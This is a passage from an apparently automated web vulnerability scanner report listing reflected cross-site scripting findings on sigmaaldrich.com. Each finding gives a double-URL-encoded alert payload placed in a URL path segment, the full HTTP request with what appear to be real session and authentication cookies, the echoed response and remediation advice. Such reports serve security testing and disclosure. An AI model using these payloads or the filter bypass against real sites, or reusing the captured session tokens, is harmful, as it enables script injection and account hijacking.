The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43c4b%2522%253balert%25281%2529%252f%252f8431a7e5877 was submitted in the REST URL parameter 6. This input was echoed as 43c4b";alert(1)//8431a7e5877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/43c4b%2522%253balert%25281%2529%252f%252f8431a7e5877/cresswellccex.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:25 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/43c4b";alert(1)//8431a7e5877/cresswellccex.pdf","E404") ;
   </script>
...[SNIP]...

1.309. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e378b%2522%253balert%25281%2529%252f%252f23f865c21a1 was submitted in the REST URL parameter 1. This input was echoed as e378b";alert(1)//23f865c21a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etce378b%2522%253balert%25281%2529%252f%252f23f865c21a1/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etce378b";alert(1)//23f865c21a1/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.310. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b743%2522%253balert%25281%2529%252f%252f2daabd630fe was submitted in the REST URL parameter 2. This input was echoed as 5b743";alert(1)//2daabd630fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib5b743%2522%253balert%25281%2529%252f%252f2daabd630fe/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:41 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib5b743";alert(1)//2daabd630fe/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.311. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcfb6%2522%253balert%25281%2529%252f%252f9792a16b183 was submitted in the REST URL parameter 3. This input was echoed as dcfb6";alert(1)//9792a16b183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsdcfb6%2522%253balert%25281%2529%252f%252f9792a16b183/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:43 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsdcfb6";alert(1)//9792a16b183/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.312. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4097b%2522%253balert%25281%2529%252f%252fa35c3dc4905 was submitted in the REST URL parameter 4. This input was echoed as 4097b";alert(1)//a35c3dc4905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma4097b%2522%253balert%25281%2529%252f%252fa35c3dc4905/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma4097b";alert(1)//a35c3dc4905/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.313. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99216%2522%253balert%25281%2529%252f%252fecff0d357a1 was submitted in the REST URL parameter 5. This input was echoed as 99216";alert(1)//ecff0d357a1 in the application's response.

